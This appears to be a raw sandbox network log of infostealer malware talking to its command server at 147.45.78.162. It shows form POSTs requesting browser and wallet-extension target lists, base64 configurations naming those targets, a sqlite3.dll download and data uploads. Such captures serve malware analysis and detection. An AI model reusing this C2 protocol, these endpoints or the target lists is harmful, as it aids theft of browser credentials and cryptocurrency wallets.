Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>
Jul 1, 2024 13:02:05.288269997 CEST	662	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC Host: 147.45.78.162 Content-Length: 462 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 [TRUNCATED] Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="message"browsers------CAFBGHIDBGHJJKFHJDHC--
Jul 1, 2024 13:02:05.493572950 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Jul 1, 2024 13:02:05.494684935 CEST	480	IN	Data Raw: 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 Data Ascii: cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFB
Jul 1, 2024 13:02:05.496716976 CEST	661	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBG Host: 147.45.78.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 [TRUNCATED] Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"plugins------ECGDHDHJEBGHJKFIECBG--
Jul 1, 2024 13:02:05.700850010 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Jul 1, 2024 13:02:05.701958895 CEST	1236	IN	Data Raw: 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 Data Ascii: bWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWx
Jul 1, 2024 13:02:05.701972008 CEST	288	IN	Data Raw: 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 6c 68 59 6d 46 6a 61 32 52 71 59 32 6c 76 62 6d 74 76 59 6d 64 73 62 57 52 6b 5a 6d 4a 6a 61 6d Data Ascii: YmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGN
Jul 1, 2024 13:02:05.704854012 CEST	1236	IN	Data Raw: 66 44 42 38 56 47 56 36 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 Data Ascii: fDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Z
Jul 1, 2024 13:02:05.704885960 CEST	1236	IN	Data Raw: 5a 57 52 76 61 57 70 74 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 Data Ascii: ZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGF
Jul 1, 2024 13:02:05.709955931 CEST	380	IN	Data Raw: 61 32 52 6e 61 57 4a 73 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 Data Ascii: a2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWd
Jul 1, 2024 13:02:05.711464882 CEST	662	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCA Host: 147.45.78.162 Content-Length: 462 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 [TRUNCATED] Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="message"fplugins------AEBAKJDGHIIJJKFHCFCA--
Jul 1, 2024 13:02:05.913609028 CEST	303	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 108 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jul 1, 2024 13:02:05.936443090 CEST	201	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE Host: 147.45.78.162 Content-Length: 7017 Connection: Keep-Alive Cache-Control: no-cache
Jul 1, 2024 13:02:05.936505079 CEST	7017	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this ser
Jul 1, 2024 13:02:06.147423983 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 1, 2024 13:02:06.799196959 CEST	92	OUT	GET /d82daa352ff6e06f/sqlite3.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:07.003245115 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:06 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 21:30:30 GMT ETag: "10e436-5e7f4c9f70980" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B
Jul 1, 2024 13:02:07.004036903 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 Data Ascii: @0B/70#N@B/81s:<R@B/92P @B
Jul 1, 2024 13:02:07.004049063 CEST	128	IN	Data Raw: 0a 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 47 f7 0a 00 83 ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed Data Ascii: \|$D$4$Gtu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$
Jul 1, 2024 13:02:07.006259918 CEST	1236	IN	Data Raw: 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 ea fc ff ff 83 ec 0c eb 8a 90 8d 74 26 00 83 fb 01 75 70 Data Ascii: w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'
Jul 1, 2024 13:02:08.256902933 CEST	200	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB Host: 147.45.78.162 Content-Length: 945 Connection: Keep-Alive Cache-Control: no-cache
Jul 1, 2024 13:02:08.514193058 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 1, 2024 13:02:09.037518978 CEST	350	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAK Host: 147.45.78.162 Content-Length: 150 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 68 74 74 70 3a 2f 2f 31 34 37 2e 34 35 2e 37 38 2e 31 36 32 2f 61 31 37 38 36 31 62 39 63 62 36 66 31 61 35 33 2e 70 68 70 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: http://147.45.78.162/a17861b9cb6f1a53.php------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="file"------EGDBFIIECBGDGDGDHCAK--
Jul 1, 2024 13:02:09.246896029 CEST	461	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 266 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML 